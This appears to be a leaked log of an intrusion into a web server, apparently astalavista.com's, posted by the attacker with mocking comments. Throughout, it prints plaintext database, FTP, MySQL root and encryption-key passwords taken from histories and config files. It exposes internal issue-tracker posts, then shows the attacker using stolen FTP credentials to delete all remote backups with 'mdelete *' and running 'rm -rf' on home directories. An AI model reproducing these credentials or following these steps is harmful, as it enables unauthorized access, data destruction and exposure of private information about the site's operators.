root             pts/1    adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
com              pts/0    cust.static.212- Tue Jun 2 07:46:30 +0000 2009
astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009

sh-3.2# ls -la
total 453376
drwxr-x--- 15 root root 4096 Jun 4 08:40 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
-rw-r--r-- 1 root root 2394400 Oct 19 2007 10mbtest.zip
-rw------- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
-rw------- 1 root root 16836 Jun 4 07:21 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
-rwx------ 1 root root 1899 Oct 28 2007 bk.sh
-rw-r--r-- 1 root root 1327 Nov 29 2007 cert
-rw-r--r-- 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
-rw-r--r-- 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
drwx------ 2 root root 4096 Oct 28 2007 .elinks
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
-rw-r--r-- 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
-rw------- 1 root root 0 Apr 16 13:19 .history
-rw-r--r-- 1 root root 16095 Sep 11 2007 install.log
-rw-r--r-- 1 root root 2566 Sep 11 2007 install.log.syslog
-rw-r--r-- 1 root root 1003 Jul 22 2007 install.sh
-rw------- 1 root root 35 Jun 2 14:23 .lesshst
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
-rw-r--r-- 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
-rw-r--r-- 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
-rwx------ 1 root root 760 Sep 18 2008 lp
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
-rw-r--r-- 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
-rw-r--r-- 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
-rw-r--r-- 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
-rw-r--r-- 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
-rw-r--r-- 1 root root 25316 Feb 15 2006 mybk.sh
-rw------- 1 root root 41 Oct 19 2007 .my.cnf
-rw------- 1 root root 2902 Jun 4 08:40 .mysql_history
-rwx------ 1 root root 38873 Apr 16 2008 mysqlreport
-rw------- 1 root root 41 May 20 2008 .mytop
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
-rw-r--r-- 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
-rw------- 1 root root 1462 Sep 21 2007 opt.php
-rw-r--r-- 1 root root 3371 Sep 22 2007 p
-rw-r--r-- 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
-rw------- 1 root root 1024 Feb 3 21:32 .rnd
-rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
-rw-r--r-- 1 root root 887 Nov 28 2007 server.key
drwx------ 2 root root 4096 Oct 10 2008 .ssh
-rw-r--r-- 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
-rw-r--r-- 1 root root 104874307 Oct 17 2007 test100.zip
-rw-r--r-- 1 root root 67085540 Oct 19 2007 test100.zip.1
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
-rw-r--r-- 1 root root 42596 May 21 2007 tuning-primer.sh
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
-rw-r--r-- 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
-rw------- 1 root root 12997 May 16 2008 .viminfo

sh-3.2# cat .bash_history
[snip]
wget cp4sst.com/sstlinux.tar.gz
tar zxvf sstlinux.tar.gz
cd linux-2.6.27.10
sh install.sh
make bzImage ; make modules ; make modules_install ; make install
make clean
service mysqld restart
[snip]
cd /usr/sbin/
chmod 4777 traceroute
chmod 4777 ping
traceroute -I www.astalavista.ch
[snip]
vi /etc/csf/csf.conf
traceroute google.ch
service csf restart
tracert google.ch
service csf restart
traceroute www.google.ch
tracert www.google.ch
traceroute www.google.ch
locate traceroute
chown 4755 /bin/traceroute
chown 4777 /bin/traceroute
locate ping
chown 4755 /bin/ping
chown 4777 /bin/ping
cd /bin/
ls -ali | grep ping
chown root ping
chmod 4755 ping
ls -ali | grep traceroute
chown root traceroute
chmod 4755 traceroute
ls -ali | grep traceroute
traceroute -I www.google.ch
traceroute www.google.ch
whois pmsantos.ch
[snip]
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
top
ping ssth.ch
ping asdlkfaljgasd???ljg???lasj.ch
ping asdlkfaljgasdlasj.ch
ping www.ssth.ch
ping ssth.ch
nslookup www.google.ch
nslookup www.ssth.ch
man nslookup
ping www.google.ch
nslookup www.google.ch
nslookup www.google.ch
nslookup salfjasdlf.ch
[snip]
openssl passwd -1 sadf
openssl passwd -1 5cZNHstdTy
mysql
mysql
locate proftp
vi /etc/proftpd.passwd
service proftpd restart
locate proftpd.conf
vi /etc/proftpd.conf
vi /etc/proftpd.passwd
service proftpd restart
[snip]
/bin/sh /home/com/backup_system/backup.sh
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
ls -ali
mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
crontab -l
crontab -l
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
/home/com/public_html/modifications/cronjobs/exploits.sh
wget http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
cd lsws-4.0.3
sh install.sh
uptime
hdparm -tt /dev/sda
iostat
yum install iostat
iostat
whereis iostat
yjm clean all
yum clean all ; yum -y update
iostat
yum install systat
rpm -qa | grep iostat
rpm -qa | grep sysstat
rpm -qa | grep systat
dmesg -c
sysctl -p
uname -r
cd /usr/src
wget nix101.com/kernels/sstlinux.tar.gz
shutdown -r now
nano -w /boot/grub/grub.conf

sh-3.2# cat .my.cnf
[client]
user=da_admin
password=X9dctmRH

sh-3.2# cat /home/com/backup_system/backup.sh
#!/bin/sh
#####################################################################
#                                                                   #
# incremental backup for astalavista.com                            #
#                                                                   #
# author: Paulo M. Santos <paulo.santos@astalavista.com>            #
#                                                                   #
#####################################################################
[snip]
PROG_DIR="/home/com/backup_system";
BACKUP_DIR="/home/com/backups";
DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
# ftp for synology backup server
FTP_HOST="212.254.194.163";
FTP_PORT="21";
FTP_USER="astalavista.com";
FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
FTP_DIR="/astalavista.com";
# database
DB_HOST="localhost";
DB_USER="contrexxuser2";
DB_PASS="0fEYNZgXz1pKe";
DB_DATABASE1="com_contrexx2_live";
DB_DATABASE2="com_contrexx2";
[snip]
ftp -in $FTP_HOST $FTP_PORT <<EOF
quote USER $FTP_USER
quote PASS $FTP_PASS
cd $FTP_DIR
put $DB_FULLNAME-SQL_Dump.tar
put $BACKUP_FULLNAME-Public_HTML.tar
close
bye
EOF

sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
-rw------- 1 root root 8192 Jun 4 03:03 aquota.group
-rw------- 1 root root 8192 Jun 3 02:45 aquota.user
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.1416
drwx--x--x 10 com com 4096 Apr 28 12:40 com
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
drwx------ 3 jon jon 4096 Sep 21 2007 jon
drwx------ 2 root root 16384 Sep 11 2007 lost+found
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
drwx------ 2 jon jon 4096 Sep 15 2007 test
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp

sh-3.2# cd admin
sh-3.2# ls -la
total 1735896
drwx--x--x 9 admin admin 4096 Nov 28 2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
drwx------ 2 admin admin 4096 Sep 28 2007 backups
-rw------- 1 admin admin 860 Sep 17 2008 .bash_history
-rw-r--r-- 1 admin admin 24 Sep 14 2007 .bash_logout
-rw-r--r-- 1 admin admin 176 Sep 14 2007 .bash_profile
-rw-r--r-- 1 admin admin 124 Sep 14 2007 .bashrc
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
drwx--x--x 6 admin admin 4096 Sep 21 2007 domains
drwxrwx--- 3 admin mail 4096 Sep 21 2007 imap
-rw-r--r-- 1 root root 24 Sep 21 2007 info.php
drwx------ 2 admin admin 4096 Sep 21 2007 mail
-rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
-rw-r--r-- 1 root root 887 Nov 28 2007 server.key
-rw-r----- 1 admin mail 34 Sep 14 2007 .shadow
-rw-r----- 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
drwx--x--x 2 admin admin 4096 Jul 29 2008 user_backups

sh-3.2# ..
sh-3.2# cd jon
sh-3.2# ls -la
total 36
drwx------ 3 jon jon 4096 Sep 21 2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw------- 1 jon jon 53 Sep 21 2007 .bash_history
-rw-r--r-- 1 jon jon 24 Sep 21 2007 .bash_logout
-rw-r--r-- 1 jon jon 176 Sep 21 2007 .bash_profile
-rw-r--r-- 1 jon jon 124 Sep 21 2007 .bashrc
-rw-r--r-- 1 root root 24 Sep 21 2007 info.php
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html

sh-3.2# cd ..
sh-3.2# cd test
sh-3.2# ls -la
total 48
drwx------ 2 jon jon 4096 Sep 15 2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw------- 1 jon jon 79 Sep 21 2007 .bash_history
-rw-r--r-- 1 jon jon 24 Sep 15 2007 .bash_logout
-rw-r--r-- 1 jon jon 176 Sep 15 2007 .bash_profile
-rw-r--r-- 1 jon jon 124 Sep 15 2007 .bashrc
sh-3.2# cat .bash_history
/usr/bin/mysqladmin -u root password PoliuJhytg67

sh-3.2# cd ..
sh-3.2# cd astanet
sh-3.2# ls -la
total 52
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
-rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
-rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
-rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
-rw------- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow

sh-3.2# cd auth/
sh-3.2# ls -la
total 28
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 ..
-rw-r--r-- 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
-rw-r--r-- 1 root root 319 Jan 5 2006 hosting.config.inc.php
-rw-r--r-- 1 root root 24 Jun 4 09:38 .htadm_pwd
-rw-r--r-- 1 root root 49 Jan 5 2006 .htpasswd_newhosting
-rw-r--r-- 1 root root 51 Oct 11 2006 .htwebalizer_pwd

sh-3.2# cat hackercontest.config.inc.php
<?PHP
// Variabeln für Verbindung zur Datenbank //
$conxHost = 'localhost'; // MySQL hostname
$conxUser = 'hackercontest'; // MySQL user
$conxPassword = 'K6m@7dUc'; // MySQL password
$bfkey = 'cXvB3981'; // Encryption/Decryption Key for Blowfish
?>
sh-3.2# cat hosting.config.inc.php
<?PHP
// Variabeln für Verbindung zur Datenbank //
$conxHost = 'localhost'; // MySQL hostname
$conxUser = 'hostinguser'; // MySQL user
$conxPassword = 'cXvB3981'; // MySQL password
$bfkey = 'cXvB3981'; // Encryption/Decryption Key for Blowfish
?>

sh-3.2# cd ..
sh-3.2# cd com
sh-3.2# ls -la
total 141208
drwx--x--x 10 com com 4096 Apr 28 12:40 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwx------ 2 com com 4096 Jun 4 04:04 backups
-rw-r--r-- 1 root root 2419504 Sep 28 2007 backup.sql
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
-rw------- 1 com com 21880 Jun 2 08:07 .bash_history
-rw-r--r-- 1 com com 24 Sep 24 2007 .bash_logout
-rw-r--r-- 1 com com 176 Sep 24 2007 .bash_profile
-rw-r--r-- 1 com com 124 Sep 24 2007 .bashrc
drwx--x--x 3 com com 4096 Jan 29 2008 domains
-rw-r--r-- 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
drwxrwx--- 3 com mail 4096 Jan 6 19:24 imap
-rw------- 1 com com 69 Nov 18 2008 .lesshst
drwx------ 2 com com 4096 Sep 24 2007 mail
-rw------- 1 com com 13970 Mar 28 21:42 .mysql_history
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
-rw-r----- 1 com mail 34 Sep 24 2007 .shadow
drwx------ 2 com com 4096 Aug 26 2008 .ssh
-rwx------ 1 com com 8515 Feb 10 2008 t
-rw-rw-r-- 1 com com 6265 Feb 11 2008 t.c
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
-rw-rw-r-- 1 com com 617 May 20 2008 .toprc
-rw-rw-r-- 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
-rw------- 1 com com 16629 Mar 28 21:46 .viminfo
-rw-rw-r-- 1 com com 51 Aug 25 2008 .vimrc

sh-3.2# head t.c
/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *

sh-3.2# cd /
sh-3.2# ls -la
total 360
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
-rw------- 1 root root 10240 Jun 3 02:39 aquota.group
-rw------- 1 root root 10240 Jun 3 02:39 aquota.user
-rw-r----- 1 root root 819 Jul 17 2008 astalavista.us.db
-rw-r--r-- 1 root root 0 Jun 3 02:43 .autofsck
-rw-r--r-- 1 root root 0 Sep 16 2007 .autorelabel
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
-rw-r--r-- 1 root root 13387 Mar 20 2008 httpd.conf
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
drwx------ 2 root root 16384 Sep 11 2007 lost+found
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
-rw-r--r-- 1 root root 5859 Feb 3 2008 mrtg.cfg
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
drwxr-x--- 15 root root 4096 Jun 4 08:40 root
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var

sh-3.2# cd opt
sh-3.2# ls -la
total 20
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws

sh-3.2# cd lsws/
sh-3.2# ls -la
total 108
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
drwx------ 4 apache apache 4096 Jun 3 02:43 conf
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
-rw-r--r-- 1 root root 6959 May 29 15:10 LICENSE
-rw-r--r-- 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
-rw-r--r-- 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
-rw-r--r-- 1 root root 3208 May 29 15:10 LICENSE.PHP
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
drwx------ 2 apache apache 4096 Mar 20 2008 phpbuild
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
-rw-r--r-- 1 root root 6 May 29 15:10 VERSION

sh-3.2# cd conf
sh-3.2# ls -la
total 48
drwx------ 4 apache apache 4096 Jun 3 02:43 .
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
drwx------ 2 apache apache 4096 Mar 20 2008 cert
-rw-r--r-- 1 apache apache 6668 May 29 15:13 httpd_config.xml
-rw------- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
-rw-r--r-- 1 root apache 0 Jun 3 14:11 .last
-rw------- 1 apache apache 256 May 29 15:10 license.key
-rw------- 1 apache apache 256 Mar 21 2008 license.key.old
-rw------- 1 apache apache 3320 Mar 20 2008 mime.properties
-rw------- 1 apache apache 20 May 29 15:10 serial.no
drwx------ 2 apache apache 4096 Mar 20 2008 templates

sh-3.2# cat serial.no
IbDl-oVsO-CKqL-wVRa

sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 286844
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------------+
| Database              |
+-----------------------+
| information_schema    |
| astanet_ads           |
| astanet_mailing_lists |
| astanet_mediawiki     |
| astanet_membersystem  |
| com_contrexx          |
| com_contrexx2         |
| com_contrexx2_live    |
| da_roundcube          |
| dolphin               |
| ideapool              |
| mysql                 |
| test                  |
| yourmaster            |
+-----------------------+
14 rows in set (0.00 sec)

mysql> use ideapool
Database changed
mysql> show tables;
+-----------------------------------+
| Tables_in_ideapool                |
+-----------------------------------+
| eventum_columns_to_display        |
| eventum_custom_field              |
| eventum_custom_field_option       |
| eventum_custom_filter             |
| eventum_customer_account_manager  |
| eventum_customer_note             |
| eventum_email_account             |
| eventum_email_draft               |
| eventum_email_draft_recipient     |
| eventum_email_response            |
| eventum_faq                       |
| eventum_faq_support_level         |
| eventum_group                     |
| eventum_history_type              |
| eventum_irc_notice                |
| eventum_issue                     |
| eventum_issue_association         |
| eventum_issue_attachment          |
| eventum_issue_attachment_file     |
| eventum_issue_checkin             |
| eventum_issue_custom_field        |
| eventum_issue_history             |
| eventum_issue_quarantine          |
| eventum_issue_requirement         |
| eventum_issue_user                |
| eventum_issue_user_replier        |
| eventum_link_filter               |
| eventum_mail_queue                |
| eventum_mail_queue_log            |
| eventum_news                      |
| eventum_note                      |
| eventum_phone_support             |
| eventum_project                   |
| eventum_project_category          |
| eventum_project_custom_field      |
| eventum_project_email_response    |
| eventum_project_field_display     |
| eventum_project_group             |
| eventum_project_link_filter       |
| eventum_project_news              |
| eventum_project_phone_category    |
| eventum_project_priority          |
| eventum_project_release           |
| eventum_project_round_robin       |
| eventum_project_status            |
| eventum_project_status_date       |
| eventum_project_user              |
| eventum_reminder_action           |
| eventum_reminder_action_list      |
| eventum_reminder_action_type      |
| eventum_reminder_field            |
| eventum_reminder_history          |
| eventum_reminder_level            |
| eventum_reminder_level_condition  |
| eventum_reminder_operator         |
| eventum_reminder_priority         |
| eventum_reminder_requirement      |
| eventum_reminder_triggered_action |
| eventum_resolution                |
| eventum_round_robin_user          |
| eventum_search_profile            |
| eventum_status                    |
| eventum_subscription              |
| eventum_subscription_type         |
| eventum_support_email             |
| eventum_support_email_body        |
| eventum_time_tracking             |
| eventum_time_tracking_category    |
| eventum_user                      |
+-----------------------------------+
69 rows in set (0.00 sec)

mysql> describe eventum_user;
+-------------------------+------------------+------+-----+---------------------+----------------+
| Field                   | Type             | Null | Key | Default             | Extra          |
+-------------------------+------------------+------+-----+---------------------+----------------+
| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
| usr_status              | varchar(8)       | NO   |     | active              |                |
| usr_password            | varchar(32)      | NO   |     |                     |                |
| usr_full_name           | varchar(255)     | NO   |     |                     |                |
| usr_email               | varchar(255)     | NO   | UNI |                     |                |
| usr_preferences         | longtext         | YES  |     | NULL                |                |
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
+-------------------------+------------------+------+-----+---------------------+----------------+
13 rows in set (0.00 sec)

mysql> select usr_full_name,usr_email,usr_password from eventum_user;
+----------------------+-------------------------------+----------------------------------+
| usr_full_name        | usr_email                     | usr_password                     |
+----------------------+-------------------------------+----------------------------------+
+----------------------+-------------------------------+----------------------------------+
15 rows in set (0.00 sec)

mysql> select iss_description from eventum_issue where iss_id = 43;
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| iss_description
|
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in... how to do that? well think about it... if a user is watching a movie... he'll be
connected for 90 mins... 120mins... so what i propose is something like:
http://www.surfthechannel.com/
since they only provide LINKS to the movies they are LEGAL and don't break DMCA rules... so we could do the same... "iframe" the content on our website or use a system
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed... which doesn't
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
if they think it breaks copyright laws and we will remove it... i think that makes it on the border of DMCA...
We could also put advertisement during play on the flash video player itself... extra $$...

By sykadul |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

// Money and extra $$ is all they care about. remember that.

mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
+------------------------+-------------------------------------------------------------------------------------------------------------------------------------------+
| iss_summary            | iss_description
|
+------------------------+-------------------------------------------------------------------------------------------------------------------------------------------+
| Forum for REAL EXPERTS | Hello,

Ishtus and I,
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
One example a friend of mine from coresecurity.com!

We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..

|
+------------------------+-------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

// What an awesome yet original idea Ishtus and him... bring MORE security "experts", that's exactly what the world needs...

mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
+------------------+---------------------------------------------------------------------------------------------+
| iss_summary      | iss_description                                                                             |
+------------------+---------------------------------------------------------------------------------------------+
| Website guidance | Virtual Girl which guides you trought the website.

We need a girl with who you can ( talk )!!!
Also for the News!
So my suggestion is a girl who read you the news loud if you like!
you can choose between read yourselfe or she read it for you or both!
Go to www.heise.de! There is an example for Voice News! It's a good thing!!!

Have a look on the example girls!!
http://www.yaoti.com/de/free_yaoti.html

or that

http://www.yellostrom.de/

|
+------------------+---------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

// ha ha.

mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
+--------------------------+----------------------------------------------------------------------------------------------------------+
| iss_summary              | iss_description                                                                                          |
+--------------------------+----------------------------------------------------------------------------------------------------------+
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
+--------------------------+----------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

// LOL.

mysql> exit
Bye

sh-3.2# ftp 212.254.194.163
Connected to 212.254.194.163.
220 BackupCOM_VW FTP server ready.
504 AUTH: security mechanism 'GSSAPI' not supported.
504 AUTH: security mechanism 'KERBEROS_V4' not supported.
KERBEROS_V4 rejected as an authentication type
Name (212.254.194.163:root): astalavista.com
331 Password required for astalavista.com.
Password:
230 User astalavista.com logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,188)
150 Opening BINARY mode data connection for 'file list'.
dr-x------ 1 root users 4096 Jun 4 06:13 astalavista.com
226 Transfer complete.
ftp> cd astalavista.com
250 CWD command successful.
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,189)
150 Opening BINARY mode data connection for 'file list'.
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
[snip]
226 Transfer complete.
ftp> mdelete *
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,193)
150 Opening BINARY mode data connection for 'file list'.
226 Transfer complete.
ftp>

sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
-rw------- 1 root root 8192 Jun 4 03:03 aquota.group
-rw------- 1 root root 8192 Jun 3 02:45 aquota.user
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
drwx--x--x 10 com com 4096 Apr 28 12:40 com
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
drwx------ 3 jon jon 4096 Sep 21 2007 jon
drwx------ 2 root root 16384 Sep 11 2007 lost+found
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
drwx------ 2 jon jon 4096 Sep 15 2007 test
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp

sh-3.2# rm -rf backup/
sh-3.2# rm -rf backup.14161/
sh-3.2# rm -rf ftp/
sh-3.2# rm -rf jon/
sh-3.2# rm -rf my/
sh-3.2# rm -rf mysqldata/
sh-3.2# rm -rf test/
